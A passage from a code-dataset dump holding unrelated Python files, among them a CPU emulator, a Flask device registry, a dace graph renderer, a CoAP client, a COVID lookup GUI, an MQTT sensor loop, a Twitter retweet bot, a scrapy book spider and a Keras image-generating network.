+ 2\n                address = self.reg[self.ram[address + 1]]\n            # RET\n            elif instruction == 0b00010001:\n                address = self.reg[self.stack_pointer]\n                self.stack_pointer += 1\n            # CMP\n            elif instruction == 0b10100111:\n                self.alu(\"CMP\", self.ram[address + 1], self.ram[address + 2])\n                address += 3\n            # JMP\n            elif instruction == 0b01010100:\n                address = self.reg[self.ram[address + 1]]\n            # JEQ\n            elif instruction == 0b01010101:\n                if self.flags[6] == 1:\n                    address = self.reg[self.ram[address + 1]]\n                else:\n                    address += 2\n            # JNE\n            elif instruction == 0b01010110:\n                if self.flags[6] != 1:\n                    address = self.reg[self.ram[address + 1]]\n                else:\n                    address += 2\n\n            # HLT\n            elif instruction == 0b00000001:\n                break\n\n            else:\n                # print(address, 'address')\n                # print(instruction)\n                raise TypeError(\"That command has not been implemented yet\")\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"607623064","text":"from flask import Flask, jsonify, request, render_template\nimport os\nimport db\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html', devices=db.get_devices())\n\n\n@app.route('/get')\ndef get():\n    return jsonify(db.get_devices())\n\n\n@app.route('/put')\ndef put():\n    db.add_device(request.args.get('id'), request.args.get('ip'))\n    return jsonify(db.get_devices())\n\n\n@app.route('/clear')\ndef clear():\n    db.clear()\n    return \"DB Cleared\"\n\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
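A minimal client-side smoke test for the four Flask routes above; a sketch that assumes the server is running locally on the host and port from the code, and the device values are made up:

# Hypothetical check using the requests library (not part of the record).
import requests

base = 'http://localhost:5000'
requests.get(base + '/put', params={'id': 'sensor-1', 'ip': '10.0.0.5'})  # register a made-up device
print(requests.get(base + '/get').json())                                 # list all devices
requests.get(base + '/clear')                                             # wipe the store

Note that /put mutates state through a GET request; that is convenient for quick testing, but a POST would be the conventional choice.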
+{"seq_id":"158626891","text":"import copy\nimport html\nfrom dace import data, memlet\nfrom dace.graph import graph as gr, edges\n\n\ndef draw_edge_explicit(srcName, dstName, edge, sdfg, graph, **extraOpts):\n    opts = {}\n    if isinstance(edge.data, memlet.Memlet):\n        if getattr(edge.data, '__label__', False):\n            opts[\"label\"] = edge.data.__label__(sdfg, graph)\n        else:\n            opts[\"label\"] = str(edge.data)\n        if edge.data.wcr is not None:\n            opts['style'] = 'dashed'\n    elif isinstance(edge.data, edges.InterstateEdge):\n        opts.update(edge.data.dotOpts)\n    # Unhandled properties\n    elif edge.data is not None:\n        raise ValueError(\"Unhandled edge: \" + str(edge.data))\n    if extraOpts:\n        opts.update(extraOpts)  # Custom options will overwrite default\n\n    if isinstance(edge, gr.MultiConnectorEdge):\n        sconn = '' if edge.src_conn is None else (':out_' + edge.src_conn)\n        dconn = '' if edge.dst_conn is None else (':in_' + edge.dst_conn)\n    else:\n        sconn = ''\n        dconn = ''\n\n    return (\"\\\"{}\\\"{sconn} -> \\\"{}\\\"{dconn}\".format(\n        srcName, dstName, sconn=sconn, dconn=dconn) + ((\" [\" + \", \".join(\n            [\"{}=\\\"{}\\\"\".format(key, value)\n             for key, value in opts.items()]) + \"];\") if opts else \";\"))\n\n\ndef draw_edge(sdfg, graph, edge, **extraOpts):\n    srcName = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(edge.src))\n    dstName = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(edge.dst))\n    return draw_edge_explicit(srcName, dstName, edge, sdfg, graph)\n\n\ndef draw_interstate_edge(sdfg, src_graph, dst_graph, edge, **extraOpts):\n    srcName = 's%d_%d' % (sdfg.node_id(src_graph), src_graph.node_id(edge.src))\n    dstName = 's%d_%d' % (sdfg.node_id(dst_graph), dst_graph.node_id(edge.dst))\n    if isinstance(edge, gr.MultiConnectorEdge):\n        if edge.src_conn is not None:\n            srcName += '@' + edge.src_conn\n        if edge.dst_conn is not None:\n            dstName += '@' + edge.dst_conn\n\n    return draw_edge_explicit(srcName, dstName, edge, sdfg, src_graph,\n                              **extraOpts)\n\n\ndef draw_interstate_edge_by_name(srcName, dstName, edge, sdfg, src_graph,\n                                 **extraOpts):\n    return draw_edge_explicit(srcName, dstName, edge, sdfg, src_graph,\n                              **extraOpts)\n\n\ndef draw_node(sdfg, graph, obj, **kwargs):\n    name = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(obj))\n    if getattr(obj, '__label__', False):\n        opts = {\"label\": obj.__label__(sdfg, graph)}\n    else:\n        opts = {\"label\": str(obj)}\n    opts.update(kwargs)\n    opts[\"label\"] = \"\\\"{}\\\"\".format(opts[\"label\"])\n\n    if 'fillcolor' not in opts:\n        opts['fillcolor'] = '\"#ffffff\"'\n    if 'style' not in opts:\n        opts['style'] = 'filled'\n    else:\n        opts['style'] = '\"filled,%s\"' % opts['style']\n\n    ############################################\n    if getattr(obj, 'in_connectors', False) != False and len(\n            obj.in_connectors) + len(obj.out_connectors) > 0:\n        # Header\n        code = '{name} [label=<<table border=\"0\" cellspacing=\"0\">'\n        code = code.format(name=name)\n        # Input connectors\n        code += '<tr><td><table border=\"0\" cellspacing=\"0\"><tr>'\n        connector_code = []\n        for conn in sorted(obj.in_connectors):\n            connector_code.append(\n                '<td port=\"in_{conn}\" border=\"1\">{conn}</td>'\n                .format(conn=conn))\n        code += ''.join(connector_code)\n        code += '</tr></table></td></tr>'\n\n        # Contents\n        html_label = html.escape(opts['label'][1:-1])\n        code += '<tr><td>{label}</td></tr>'.format(\n            label=html_label)\n\n        # Output connectors\n        code += '<tr><td><table border=\"0\" cellspacing=\"0\"><tr>'\n        connector_code = []\n        for conn in sorted(obj.out_connectors):\n            connector_code.append(\n                '<td port=\"out_{conn}\" border=\"1\">{conn}</td>'\n                .format(conn=conn))\n        code += ''.join(connector_code)\n        code += '</tr></table></td></tr>'\n\n        # Footer\n        code += '</table>
>'\n\n filtered_opts = {k: v for k, v in opts.items() if k != 'label'}\n if len(filtered_opts.items()) > 0:\n ostr = \", \".join([\n str(key) + \"=\" + str(val)\n for key, val in filtered_opts.items()\n ])\n code += ', ' + ostr\n code += '];\\n'\n\n return code\n ############################################\n\n return \"\\\"{}\\\" [{}];\".format(\n name,\n \", \".join([str(key) + \"=\" + str(val) for key, val in opts.items()]))\n\n\ndef draw_invisible_node(name, **kwargs):\n opts = dict(label='\\\"\\\"', style=\"invisible\")\n opts.update(kwargs)\n return \"\\\"{}\\\" [{}];\".format(\n name,\n \", \".join([str(key) + \"=\" + str(val) for key, val in opts.items()]))\n\n\ndef draw_graph(sdfg, graph, standalone=True):\n \"\"\" Creates a graphviz dot file from a networkx graph input.\n\n If standalone is set, return a full dot string including header and footer.\n \"\"\"\n state_id = sdfg.node_id(graph)\n sdfg = copy.deepcopy(sdfg)\n graph = sdfg.nodes()[state_id]\n\n sdict = graph.scope_dict()\n sdict_children = graph.scope_dict(True)\n\n # Omit collapsed nodes out of nodes to draw\n def is_collapsed(node):\n scope = sdict[node]\n while scope is not None:\n if scope.is_collapsed:\n return True\n scope = sdict[scope]\n return False\n\n nodes_to_draw = set(node for node in graph.nodes()\n if not is_collapsed(node))\n\n # Collect edges to draw for collapsed nodes (we also need edges coming out of scope exits)\n nodes_for_edges = set()\n nodes_for_edges.update(nodes_to_draw)\n\n def add_exit_nodes(scope):\n for node in sdict_children[scope]:\n if node in sdict_children and node.is_collapsed:\n nodes_for_edges.add(graph.exit_nodes(node)[0])\n elif node in sdict_children:\n add_exit_nodes(node)\n\n add_exit_nodes(None)\n\n edges_to_draw = set(\n e for e in graph.edges()\n if e.src in nodes_for_edges and e.dst in nodes_for_edges)\n\n # Take care of scope entry connectors\n for node in nodes_to_draw:\n if node in sdict_children and node.is_collapsed:\n node._out_connectors.clear()\n\n # Take care of scope exit edges and connectors\n for e in edges_to_draw:\n if e.src in nodes_for_edges and e.src not in nodes_to_draw:\n newsrc = sdict[e.src]\n if newsrc is None:\n continue\n e._src = newsrc\n newsrc._out_connectors.add(e.src_conn)\n\n nodes = []\n\n def draw_recursive(toplevel):\n for node in sdict_children[toplevel]:\n if node not in nodes_to_draw: continue\n if node in sdict_children:\n name = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(node))\n nodes.append('''\nsubgraph cluster_%s {\n label = \"\";\n ''' % name)\n nodes.append(node.draw_node(sdfg, graph))\n draw_recursive(node)\n nodes.append('}\\n')\n else:\n nodes.append(node.draw_node(sdfg, graph))\n\n draw_recursive(None)\n #nodes = [x.draw_node(sdfg, graph) for x in nodes_to_draw]\n edges = [draw_edge(sdfg, graph, e) for e in edges_to_draw]\n\n if not standalone:\n return nodes, edges\n\n return \"digraph DaCe {{\\n {}\\n}}\".format(\"\\n \".join(nodes + edges))\n","sub_path":"dace/graph/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642284147","text":"from coapthon.client.helperclient import HelperClient\r\n\r\nhost = \"192.168.137.215\"\r\nport = 5683\r\npath_basic =\"basic\"\r\npath_observe = 'observe'\r\n\r\ndef OnReceiptionOfOserve(response):\r\n print(\"observe callback\")\r\n print(response.pretty_print())\r\n\r\n\r\nclient = HelperClient(server=(host, port))\r\nresponse = 
client.get(path_basic)\r\nprint(response.pretty_print())\r\n\r\nobserve = client.observe(path_observe, callback=OnReceiptionOfOserve)","sub_path":"week-11/Coap_client.py","file_name":"Coap_client.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446279691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 14:40:27 2019\n\n@author: Asuspc\n\"\"\"\n\nimport docx\nimport StyleProt1\nfrom StyleProt1 import Style,Titre1, Titre2, Titre3, TexteGris, TexteGrisJustif\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH, WD_UNDERLINE, WD_LINE_SPACING, WD_COLOR_INDEX, WD_BREAK\nfrom docx.enum.style import WD_STYLE_TYPE\nfrom docx.shared import Cm, Pt, RGBColor, Inches\n\n#MEMO FOR WRITING THE HEADINGS:\n# Titre1('number + protocol text',document)\n# Titre2('number + protocol text',document)\n# Titre3('number','text',document)\n# TexteGris(text,document)\n# TexteGrisJustif(text,document)\n\ndef Partie8(document):\n    'Creates part 8 of the category 1 protocol'\n    # document = docx.Document()\n\n\n# Page margins\n    sections = document.sections\n    for section in sections:\n        section.top_margin = Cm(2)\n        section.bottom_margin = Cm(2)\n        section.left_margin = Cm(2)\n        section.right_margin = Cm(2)\n\n#---------------------------STYLE DEFINITIONS\n    \n\n    # Style(document)\n\n\n# \n#---------------------------------------------------------------WRITING\n    \n    \n    #write the first heading \n    Titre1('8\tTRAITEMENTS ET PROCEDURES ASSOCIE(E)S ',document)\n\n    # Write section 8.1 \n    Titre2('8.1\tTraitements / procédures associé(e)s autorisés',document)\n    \n    #Write heading 8.1.1\n    Titre3('8.1.1','Médicaments auxiliaires',document)\n    \n    p=document.add_paragraph()\n    p.alignment=WD_ALIGN_PARAGRAPH.JUSTIFY\n    run1=p.add_run('Médicament auxiliaire: médicament utilisé pour les besoins d\\'un essai clinique conformément au protocole, mais non comme médicament expérimental (article 2 du règlement européen).')\n    run1.style='Paragraphe'\n    \n    #Write heading 8.1.2\n    Titre3('8.1.2','Autres traitements / procédures',document)\n    \n    #Heading 8.2\n    Titre2('8.2\tTraitements / Procédures associé(e)s interdit(e)s',document)\n    \n    #Heading 8.3\n    Titre2('8.3\tInteractions médicamenteuses',document)\n    \n    #END OF THE DOCUMENT \n    paragraph = document.add_paragraph()\n    run = paragraph.add_run()\n    run.add_break(WD_BREAK.PAGE)\n    #document.save(\"Partie7.docx\") \n    \n   # document.save(\"Partie8.docx\")\n    \n    ","sub_path":"Partie8.py","file_name":"Partie8.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
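StyleProt1 is not included in this record, so the Titre1/Titre2/Titre3 helpers are opaque here. A minimal sketch of what such a heading helper could look like with python-docx follows; the styling values are assumptions, not the author's actual implementation:

import docx
from docx.shared import Pt, RGBColor

def Titre1(text, document):
    # Hypothetical stand-in: a bold, enlarged, colored heading paragraph.
    p = document.add_paragraph()
    run = p.add_run(text)
    run.bold = True
    run.font.size = Pt(16)
    run.font.color.rgb = RGBColor(0x1F, 0x3F, 0x73)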
+{"seq_id":"429532242","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n \r\n    #user interface\r\nclass MainWindow:\r\n    def __init__(self):\r\n        self.frame = Tk()\r\n        \r\n        self.label_name = Label(self.frame,text = \"country name\")\r\n        self.input_name = Entry()\r\n        self.label_name.grid(row = 0,column = 0)\r\n        \r\n        self.button_search = Button(self.frame,text = \"Search\",width = 10)\r\n        self.button_search.bind(\"<Button-1>\",self.buttonListener1)\r\n        \r\n        self.input_name.grid(row = 0,column = 1)\r\n        self.button_search.grid(row = 3,column = 0)\r\n        \r\n        self.frame.mainloop()\r\n\r\n    ##search button callback\r\n    def buttonListener1(self,event):\r\n        name = self.input_name.get()\r\n        result = search(name)\r\n        if result==False:\r\n            tkinter.messagebox.showinfo(\"Report\",\"This country is not on the list\")\r\n        else:\r\n            tkinter.messagebox.showinfo(\"Report\",\"Data in \"+result[0]+\" is:\\n\"+\"Total Case: \"+result[1]+\"\\n\"+\"New Case: \"+result[2]+\"\\n\"+\"Total Deaths: \"+result[3]+\"\\n\"+\"Total Recovered: \"+result[4]+\"\\n\"+\"Active Cases: \"+result[5]+\"\\n\")\r\n            if result[6]==False:\r\n                tkinter.messagebox.showinfo(\"Report\",\"This country does not have a high death rate.\")\r\n            else :\r\n                tkinter.messagebox.showinfo(\"Report\",\"This country has a high death rate.\")\r\n        \r\n\r\n\r\n\r\n## Read data\r\ninfile = open(\"testing.txt\",\"r\")\r\ncontent = infile.read()\r\ndata = content.split(\"\\n\")\r\ncountryNum = 0\r\nfor i in data:\r\n    data[countryNum] = i.split(\",\")\r\n    k = 0\r\n    for element in data[countryNum]:\r\n        data[countryNum][k] = element.strip(' []\"')\r\n        k += 1\r\n    countryNum += 1\r\n\r\n\r\ncountryName = []\r\n\r\ni = 0\r\nwhile i <= 52:\r\n    countryName.append(data[i][0])\r\n    i += 1\r\n\r\n\r\n\r\n#search the data by country name\r\ndef search(name):\r\n    i = 0\r\n    for ele in data:\r\n        if ele[0]==name:\r\n            return data[i]\r\n        i+=1\r\n    return(False) \r\n\r\n\r\n#flag countries whose death rate is above the average\r\ntotalDeath = 0\r\ntotalCases = 0\r\nposition = 0\r\n\r\nfor i in countryName:\r\n    ind = countryName.index(i)\r\n    data[ind].append(0)\r\n    totalCases += int(data[ind][1])\r\n    totalDeath += int(data[ind][3])\r\n\r\naveDeathRate = totalDeath / totalCases\r\n\r\nposition = 0\r\nfor i in countryName:\r\n    ind = countryName.index(i)\r\n    if ((int(data[ind][3]))/(int(data[ind][1]))) > aveDeathRate:\r\n        data[ind][6]=1\r\n        print(\"This country, \" + i + \" has a high death risk.\")\r\n\r\n#main window\r\nframe = MainWindow()\r\n","sub_path":"covid-tracking.py","file_name":"covid-tracking.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
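A small worked check of the flagging rule used above, with made-up numbers:

# Made-up (cases, deaths) rows mirroring the script's logic.
rows = {'A': (100, 9), 'B': (100, 3), 'C': (800, 38)}
total_cases = sum(c for c, d in rows.values())    # 1000
total_deaths = sum(d for c, d in rows.values())   # 50
ave_death_rate = total_deaths / total_cases       # 0.05
flagged = [name for name, (c, d) in rows.items() if d / c > ave_death_rate]
print(flagged)  # ['A']: only A's rate (0.09) exceeds the average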
+{"seq_id":"557148777","text":"import machine, time, json\n\nfrom wlan_manager import WLAN_Manager # Wireless Connection \nwlan_client = WLAN_Manager()\nwlan_client.start()\n\nfrom mqtt_manager import MQTT_Manager # MQTT Connection\nmqtt_client = MQTT_Manager()\nmqtt_client.check() # Open connection to broker\nTOPIC_SUB = mqtt_client.get_topic('control')\nTOPIC_PUB = mqtt_client.get_topic('status')\n\ndef mqtt_callback(topic, msg):\n    print('MSG! Topic:{}; Data:{}'.format(topic, msg))\nmqtt_client.broker.set_callback(mqtt_callback)\nmqtt_client.broker.subscribe(TOPIC_SUB)\n\n# Change this to your sensor\nfrom board_manager import D1\nfrom sensor_manager import Sensor_DS18B20\nsensor = Sensor_DS18B20(D1) # Pin 5 = D1\n\nDELAY = 5 * 1000 # DELAY in milliseconds\nwhile True:\n    sensor.read()\n    msg = sensor.values_dict\n    print(msg)\n    mqtt_client.send(TOPIC_PUB, json.dumps(msg))\n    t_start = time.ticks_ms()\n    while time.ticks_diff(time.ticks_ms(), t_start) <= DELAY:\n        mqtt_client.check_msg() # check for new messages\n        time.sleep_ms(200)\n#End main loop\n","sub_path":"examples/MQTT_PUB_and_SUB_example.py","file_name":"MQTT_PUB_and_SUB_example.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
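The publish loop above deliberately polls for inbound MQTT messages while waiting out DELAY instead of sleeping through it. The same pattern expressed in plain CPython, where time.monotonic stands in for MicroPython's time.ticks_ms/ticks_diff and poll is a hypothetical stand-in for check_msg:

import time

def wait_and_poll(delay_s, poll):
    # Keep servicing incoming messages until delay_s seconds have elapsed.
    t_start = time.monotonic()
    while time.monotonic() - t_start <= delay_s:
        poll()
        time.sleep(0.2)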
)\", review)\n \n num_sentence = len(sentences_review)\n \n for index in range(0,num_sentence):\n if len(sentences_review[index]) <= 2:\n sentences_review[index-1] +=sentences_review[index]\n \n for index in range(0,num_sentence):\n try:\n if len(sentences_review[index]) <= 2:\n del sentences_review[index]\n except IndexError:\n break\n return sentences_review\n\ndef tokenize_sentence(sentence, is_handling_negation = True):\n # melakukan tokenasi terhadap sentence\n # jika is_handling_negation = True, maka negasi di handle\n tokenized_sentence = word_tokenize(sentence) \n \n if is_handling_negation:\n tokenized_sentence = handling_negation_of_tokenized_sentence(tokenized_sentence)\n\n return tokenized_sentence \n\ndef handling_negation_of_tokenized_sentence(tokenized_sentence): \n # melakukan handlingg terhadap sentence yang sudah di tokenized (list of token)\n negation_token = [\"not\", \"n't\", \"no\"]\n \n negated = False\n negation_handled_sentence = []\n \n for token in tokenized_sentence:\n if token in negation_token:\n negated = True\n else:\n if negated:\n negation_handled_sentence.append(\"not \" + token)\n else:\n negation_handled_sentence.append(token)\n negated = False \n return negation_handled_sentence \n\ndef review_to_tokenized_sentences(review, is_handling_negation=True):\n # melakukan tokenizing review (review -> sentences -> )\n sentences = review_to_sentences(review)\n tokenized_review = []\n for sentence in sentences:\n \n tokenized_sentence = tokenize_sentence(sentence, is_handling_negation)\n #print(tokenized_sentence)\n tokenized_review.append(tokenized_sentence)\n \n return tokenized_review\n\n\ndef testing_tokenize_review():\n review = \"Although I didn't like Stanley & Iris tremendously as a film, I did admire the acting! Jane Fonda and Robert De Niro are great in this movie. I haven't always been a fan of Fonda's work but here she is delicate and strong at the same time. De Niro has the ability to make every role he portrays into acting gold. He gives a great performance in this film and there is a great scene where he has to take his father to a home for elderly people because he can't care for him anymore that will break your heart. 
I wouldn't really recommend this film as a great cinematic entertainment, but I will say you won't see much bette acting anywhere.\"\n review_to_tokenized_sentences(review)\n \n \nif __name__ == \"__main__\":\n # it is saved to data/structured/sentence_neg_handled/\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('train','pos')\")\n # read_dataset.save_from_corpus_to_sent(\"train\",\"pos\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('test','pos')\")\n # read_dataset.save_from_corpus_to_sent(\"test\",\"pos\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('train','neg')\")\n # read_dataset.save_from_corpus_to_sent(\"train\",\"neg\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('test','neg')\")\n # read_dataset.save_from_corpus_to_sent(\"test\",\"neg\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('train','pos')\")\n read_dataset.save_from_corpus(\"train\",\"pos\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('test','pos')\")\n read_dataset.save_from_corpus(\"test\",\"pos\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('train','neg')\")\n read_dataset.save_from_corpus(\"train\",\"neg\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('test','neg')\")\n read_dataset.save_from_corpus(\"test\",\"neg\")\n \n ","sub_path":"negation_handling.py","file_name":"negation_handling.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371835537","text":"import cv2\nimport sys\nimport numpy as np\nimport os.path\nfrom glob import glob\n\ndef detect(filename, filename2):\n\timageLeft = cv2.imread(filename)\n\timageRight = cv2.imread(filename2)\n\twidth = len(imageLeft[0])\n\theight = len(imageRight)\n\n\toutIMG = np.zeros((height, width * 2, 3), np.uint8)\n\tfor x in range(0, height):\n\t\tfor y in range(0, width):\n\t\t\toutIMG[x][y] = imageLeft[x][y]\n\t\tfor y in range(width, width * 2):\n\t\t\toutIMG[x][y] = imageRight[x][y - width]\n\tcv2.imwrite(\"./output/\" + filename[7:len(filename)], outIMG)\n\tprint(filename[7:len(filename)] + \" Done.\")\n\nif __name__ == '__main__':\n\tif os.path.exists('output') is False:\n\t\tos.makedirs('output')\n\tfile_list = glob('./input/*.jpg')\n\tfile_list2 = glob('./right/*.jpg')\n\tfor i in range(0, len(file_list)):\n\t\tdetect(file_list[i], file_list2[i])\n","sub_path":"paste.py","file_name":"paste.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236012024","text":"#Exercise 5 Om and Joshua\n\nimport os\nimport numpy\nimport pandas\n\n\n#Set working directory and read in wages file\nos.chdir('/Users/omneelay/Desktop/Exercise5/Intro_Biocomp_ND_318_Tutorial5/')\nwages=pandas.read_csv(\"wages.csv\")\n\n#START OF CHALLENGE 1\n#isolate 2 columns: Gender and YearsExperience \nfirst2columns=wages.iloc[:,0:2]\n\n#isolate females and males separately\nfemales=first2columns[first2columns.gender==\"female\"]\nmales=first2columns[first2columns.gender==\"male\"]\n\n#remove duplicates and make into panda dataframe form\nF=females.drop_duplicates()\nM=males.drop_duplicates()\nf=pandas.DataFrame(F)\nm=pandas.DataFrame(M)\n\n#concatenate dataframes and write to a file\nA=pandas.concat([f,m])\nfirst2columnsA=A.iloc[:,0:2]\nfirst2columnsA\nA.to_csv(\"challenge1.txt\",sep=' ')\n\n#START OF CHALLENGE 
2","sub_path":"Exercise5_Old.py","file_name":"Exercise5_Old.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516776389","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom scrapy import Spider\nfrom scrapy.http import Request\n\n\nlogging.basicConfig(filename='BooksSpider.log',\n filemode='w', # logging for each run will start afresh\n level=logging.DEBUG,\n format='%(asctime)s %(message)s')\nlogger = logging.getLogger()\n\n\ndef product_info(response, value):\n return response.xpath('//th[text()=\"' + value + '\"]/following-sibling::td/text()').extract_first()\n\n\nclass BookSpider(Spider):\n name = 'BookSpider'\n allowed_domains = ['books.toscrape.com']\n start_urls = ['http://books.toscrape.com']\n\n def parse(self, response):\n categories = response.xpath('//ul/li/a/@href').extract()\n for category in categories:\n category_url = response.urljoin(category)\n yield Request(category_url, callback=self.parse_category)\n\n def parse_category(self, response):\n books = response.xpath('//h3/a/@href').extract()\n category = response.xpath('//h1/text()').extract()\n logger.info('Scraping category: {}'.format(category))\n for book in books:\n absolute_url = response.urljoin(book)\n yield Request(absolute_url, callback=self.parse_book)\n\n # process next page\n next_page_url = response.xpath('//a[text()=\"next\"]/@href').extract_first()\n absolute_next_page_url = response.urljoin(next_page_url)\n yield Request(absolute_next_page_url, callback=self.parse_category)\n\n def parse_book(self, response):\n category = response.xpath('//li/a/text()')[-1].extract()\n title = response.css('h1::text').extract_first()\n logger.info('Scraping book: {}'.format(title))\n price = response.xpath('//*[@class=\"price_color\"]/text()').extract_first()\n\n image_url = response.xpath('//img/@src').extract_first()\n image_url = image_url.replace('../..', 'http://books.toscrape.com/')\n\n rating = response.xpath('//*[contains(@class, \"star-rating\")]/@class').extract_first()\n rating = rating.replace('star-rating ', '')\n\n description = response.xpath(\n '//*[@id=\"product_description\"]/following-sibling::p/text()').extract_first()\n\n # product information data points\n upc = product_info(response, 'UPC')\n product_type = product_info(response, 'Product Type')\n price_without_tax = product_info(response, 'Price (excl. tax)')\n price_with_tax = product_info(response, 'Price (incl. tax)')\n tax = product_info(response, 'Tax')\n availability = product_info(response, 'Availability')\n number_of_reviews = product_info(response, 'Number of reviews')\n\n yield {\n 'category': category,\n 'title': title,\n 'price': price,\n 'image_url': image_url,\n 'rating': rating,\n 'description': description,\n 'upc': upc,\n 'product_type': product_type,\n 'price_without_tax': price_without_tax,\n 'price_with_tax': price_with_tax,\n 'tax': tax,\n 'availability': availability,\n 'number_of_reviews': number_of_reviews\n }","sub_path":"books_crawler/books_crawler/spiders/books_crawler.py","file_name":"books_crawler.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592227232","text":"#A Keras, Wasserstein Generative Adversarial Network with the generator as a Compositional Pattern Producing Network\n#Heavily influenced by http://blog.otoro.net/2016/04/01/generating-large-images-from-latent-vectors/\n#Novel (maybe?) 
in that it uses Wasserstein loss to achieve diversity and stability in generating color images\n\n\n#CPPNs are attractive because they can generate aesthetically pleasing large images without a super-resolution network by inputting fractions of integers during prediction\nimport tensorflow as tf\nfrom tensorflow.contrib import keras as keras\n\n\nfrom keras import backend as K\nfrom keras.layers import TimeDistributed\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D,TimeDistributed,Lambda,MaxPooling2D,SeparableConv2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, Model, load_model\nfrom keras.optimizers import Adam, SGD, RMSprop\nfrom keras import backend as K\nfrom keras.layers.merge import add\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.utils import plot_model\n\n\n\n\n\nimport numpy as np\n\nimport os\nimport random\n\nimport imageio\nfrom scipy import misc, ndimage\n\n#can't change scaler rn and reload. Fix that or at least make a generator mode that only loads generator weights and then fits\n\nsideL = 32#width and height by pixel of resized images\nzN = 20#latent vector's size\nbatch_size = 4#size of batches\nload = True#whether to load model from file\nlr = .0001#change b1 in adam to .5\nbatches = 1200\nscaler = 4#scales up image\n\ndef loadDataset(location):#input string indicating dataset location; output numpy array of images\n\tfiles = os.listdir(location)\n\tos.chdir(location)\n\t#get only the files we want from the dataset\n\tremover = []\n\tfor i in files:\n\t\tfilename, file_extension = os.path.splitext(i)\n\t\tif file_extension != '.jpg':\n\t\t\tremover.append(i)\n\tfor i in remover:\n\t\tfiles.remove(i)\n\t\t\n\tX_train = np.zeros((len(files),sideL,sideL,3))\n\tfor i in range(len(files)):\n\t\tgreader = imageio.get_reader(files[i])\n\t\tfirst = greader.get_data(0)\n\t\tfirst = misc.imresize(first,(sideL,sideL,3))\n\t\tfirst = first/255\n\t\tX_train[i] = first\n\treturn X_train\n\t\n#initializers\ndef my_init(shape, dtype=None):\n return K.random_normal_variable(shape=shape, mean=.0, scale=.5)\n\ndef small_init(shape, dtype=None):\n return K.random_normal_variable(shape=shape, mean=.0, scale=.01)\n\ndef generator(input_z):\n\t\n\twith tf.variable_scope('generator'):\n\t\t\n\t\t#create generator\n\t\t\n\t\tinputs = Input(tensor = input_z)\n\n\t\tj = Dense(30,activation='linear')(inputs)\n\t\tfor i in range(4):#JUST TESTING! 
CHANGE LATER\n\t\t\tz = BatchNormalization()(j)\n\t\t\tx = Dense(30,kernel_initializer=my_init)(z)\n\t\t\tx = Activation('relu')(x)\n\t\t\tx = Dense(30,kernel_initializer=my_init)(x)\n\t\t\tx = Activation('relu')(x)\n\t\t\tx = Dense(30,activation='tanh')(x)\n\t\t\t\n\t\t\tj = add([j,x]) #residual network\n\n\t\tend = Dense(3,activation='sigmoid',name='gend',kernel_initializer=small_init)(j)\n\n\t\t\n\t\t#inny = Input(shape=(sideL*sideL,3+zN),tensor = input_z)\n\t\t#xer = TimeDistributed(Dense(sideL*sideL))(end)\n\t\t\n\t\t\n\t\t\n\t\tgen = Model(inputs,end)\n\t\t\n\t\treturn end,gen\n\t\ndef discriminator(image):#I'VE REPLACED BATCHNORMS WITH LAYERNORMS\n\talphaL = .2\n\twith tf.variable_scope('discriminator', reuse=tf.AUTO_REUSE):\n\t\tinny = tf.reshape(image,(batch_size,sideL,sideL,3))\n\t\t\n\t\tconv1 = tf.layers.Conv2D(filters=32,kernel_size=5,strides=2,padding='SAME')\n\t\tconv1 = conv1(inny)\n\t\tleaky1 = tf.maximum(alphaL * conv1, conv1)\n\t\t\n\t\tdrop1 = tf.layers.dropout(leaky1)\n\t\t\n\t\tconv2 = 